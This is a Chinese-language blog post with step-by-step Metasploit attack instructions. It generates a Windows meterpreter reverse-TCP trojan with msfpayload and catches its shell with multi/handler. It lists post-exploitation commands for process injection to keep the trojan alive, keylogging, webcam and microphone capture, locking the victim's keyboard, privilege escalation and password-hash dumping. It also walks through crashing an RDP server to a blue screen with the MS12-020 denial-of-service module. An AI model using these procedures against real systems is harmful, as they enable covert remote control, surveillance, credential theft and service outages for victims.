kali linux 远程攻击
Metasploit
1启动:msfconsole
exploit 漏洞利用工具
payloads ----àshellcode 漏洞利用后执行的代码
木马 控制 服务器
远程控制 木马程序
2.根据自己的ip生成一个木马
msfpayload windows/meterpreter/reverse_tcp LHOST=linux的ip LPORT=55555 X > test.exe
windows/meterpreter/reverse_tcp 目录
LHOST 本地的IP
LPORT 端口 (高端口容易过防火墙)
X 二进制 > 写 test.exe 二进制文件(木马程序)
主文件夹下
3.
use exploit/multi/handler
使用handler这个模块
4.使用show options 查看参数(发现无参数)
.
5.直接选下一个 set PAYLOAD windows/meterpreter/reverse_tcp
reverse_tcp 反向的链接(使用 shellcold 程序)
6.此时再次查看参数 show options
LHOST = 生成木马的linux IP 地址 (均要填写)
LPORT = 高端口 55555
7.填写生成木马的ip 以及端口
set LHOST linux IP
set LPORT 55555
生成完后,再次查看是否填写 show options
8.执行 exploit (等待链接状态)
等待点击木马
Metasploit(工具使用)
background 将会话放入后台
sessions -l 查看后台的会话
sessions -i 1 切换回刚才的会话
注入进程(防止木马被关闭)
ps 得到想要的PID进程
migrate PID 注入
(216 184 explorer.exe 桌面管理进程)
migrate 216 注入
(查看进程 PS)
例如 meterpreter> run vnc 开启远程桌面
文件管理功能 (file system commands)
download
edit (编辑文件) 后面直接加文件名
cat(查看文件)
mkdir (创建文件夹)
mv (移动文件)
rm (删除文件)
upload (上传)
rmdir (删除文件夹)
网络和系统操作 Networking commands
arp (查看arp缓存表)
getproxy (获取本机的代理)
ifconfig
ipconfig
netstat (查看本机的端口链接)
系统操作
kill 结束进程 (后面直接跟进程的PID号)
ps 查看进程
reboot 重启
reg 修改注册表
shell 获取终端
shutdown 关机
sysinfo 获取电脑信息
用户和其余操作 user interface commands
enumdesktops 用户登录数
keyscan_dump 键盘记录_下载
keyscan_start 键盘记录_开始
keyscan_stop 键盘记录_停止
uictl 获得键盘鼠标控制权
摄像头操作
record_mic 音频录制
webcam_chat 查看摄像头接口
webcam_list 查看摄像头列表
webcam_stream 摄像头视频录制
getsystem 获取高权限
hashdump 下载管理员的哈希密文
键盘记录的用法
1).先keyscan_start 开始记录
2). 再次 keyscan_dump 下载查看记录
3). Keyscan_stop 停止监听
键盘鼠标的锁定
uictl -h 查看参数
enable(打开) disable(锁定) keyboard(键盘) mouse(鼠标)
例:uictl disable keyboard 锁定键盘
注:键盘锁定时,win+E 任然可以用
音频录制:先查看参数在录制
Metasploit—(服务器蓝屏攻击)
条件:服务器必须开启 3389 端口( netstat –an 可进行查看)
目标:(DDOS 攻击)192.168.X.X
漏洞名称:MS12—020
1启动:msfconsole
2.输入 search ms12-020
解释:
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
服务器远程桌面的模块
auxiliary/scanner/rdp/ms12_020_check
查看是否存在该漏洞
3. 检查 use auxiliary/scanner/rdp/ms12_020_check
(查看参数 show options)
RHOSTS 以R开头为远程主机
4.set RHOSTS 服务器的IP
5. 查看该端口是否存在 exploit
6.换模块 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
7.查看参数 show options
写入IP : set RHOST 服务器IP 再次查看是否设置成功
8.重新开一个终端,用ping (服务器) :正常应为ping通
(在网站的搜索栏,进入看是否能进入:输入服务器的IP)
9. 输入 exploit 攻击开始
结果:服务器蓝屏,无法ping 通
开启:3389:
http://blog.csdn.net/bekilledlzy/article/details/1817637
Ms12-020解决措施
http://cert.ecnu.edu.cn/s/182/t/261/67/49/info26441.htm
注:
如果对方开启了防火墙或者修改了3389端口,可以通过下面方式查看:有一个 XXXX/tcp open realserver (可疑)
端口讲解
http://vip.2cto.com/jc/241.html
本文出自 “10883981” 博客,转载请与作者联系!